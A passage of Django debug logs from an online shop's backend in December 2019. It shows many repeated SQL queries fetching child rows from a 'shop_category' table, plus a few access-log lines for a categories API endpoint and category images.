"shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-19 13:47:39,894 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-19 13:47:39,899 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-19 13:47:39,905 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-19 13:47:39,908 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-19 13:47:39,911 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-19 13:47:39,915 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-19 13:47:39,919 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-19 13:47:39,924 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-19 13:47:39,927 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-19 13:47:39,931 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-19 13:47:39,935 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-19 13:47:39,938 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-19 13:47:39,943 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-19 13:47:39,947 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-19 13:47:39,950 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-19 13:47:39,953 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-19 13:47:39,957 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-19 13:47:39,961 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-19 13:47:39,964 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-19 13:47:39,967 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-19 13:47:39,970 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-19 13:47:39,975 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-19 13:47:39,978 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [19/Dec/2019 13:47:39] "GET /api/v1/categories/ HTTP/1.0" 200 15396 [19/Dec/2019 13:47:45] "GET /media/categories/2019/12/07/collection2.png HTTP/1.0" 200 466113 [19/Dec/2019 13:47:45] "GET /media/categories/2019/12/07/collection10.png HTTP/1.0" 200 387799 [19/Dec/2019 13:47:45] "GET /media/categories/2019/12/07/collection7.png HTTP/1.0" 200 379075 [19/Dec/2019 13:47:45] "GET /media/categories/2019/12/07/collection4.png HTTP/1.0" 200 432480 [19/Dec/2019 13:47:45] "GET /media/categories/2019/12/07/collection6.png HTTP/1.0" 200 600645 [19/Dec/2019 13:47:45] "GET /media/categories/2019/12/07/collection3.png HTTP/1.0" 200 784410 [19/Dec/2019 13:47:48] "GET /media/categories/2019/12/07/collection8.png HTTP/1.0" 200 376652 [19/Dec/2019 13:47:51] "GET /media/categories/2019/12/07/collection9.png HTTP/1.0" 200 284188 [19/Dec/2019 13:47:52] "GET /media/categories/2019/12/07/collection5.png HTTP/1.0" 200 454674 [19/Dec/2019 13:47:53] "GET /media/categories/2019/12/07/collection1.png HTTP/1.0" 200 793553 DEBUG 2019-12-19 13:49:45,626 utils 4252 140031492613888 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-19 13:49:45,635 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-19 13:49:45,640 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-19 13:49:45,644 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-19 13:49:45,649 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-19 13:49:45,652 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-19 13:49:45,656 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-19 13:49:45,659 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-19 13:49:45,662 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-19 13:49:45,665 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-19 13:49:45,668 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-19 13:49:45,670 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-19 13:49:45,673 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-19 13:49:45,676 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-19 13:49:45,679 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-19 13:49:45,682 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-19 13:49:45,685 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-19 13:49:45,688 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-19 13:49:45,696 utils 4252 140031492613888 (0.006) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-19 13:49:45,701 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-19 13:49:45,704 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-19 13:49:45,706 utils 4252 140031503103744 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."id" = 10; args=(10,) DEBUG 2019-12-19 13:49:45,712 utils 4252 140031492613888 (0.006) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-19 13:49:45,715 utils 4252 140031503103744 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-19 13:49:45,719 utils 4252 140031492613888 (0.005) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-19 13:49:45,723 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-19 13:49:45,729 utils 4252 140031492613888 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) [19/Dec/2019 13:49:45] "GET /api/v1/categories/10 HTTP/1.0" 200 353 DEBUG 2019-12-19 13:49:45,735 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-19 13:49:45,740 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-19 13:49:45,743 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-19 13:49:45,747 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-19 13:49:45,751 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-19 13:49:45,757 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-19 13:49:45,761 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-19 13:49:45,765 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-19 13:49:45,768 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-19 13:49:45,772 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-19 13:49:45,778 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-19 13:49:45,781 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-19 13:49:45,785 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-19 13:49:45,788 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-19 13:49:45,792 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", 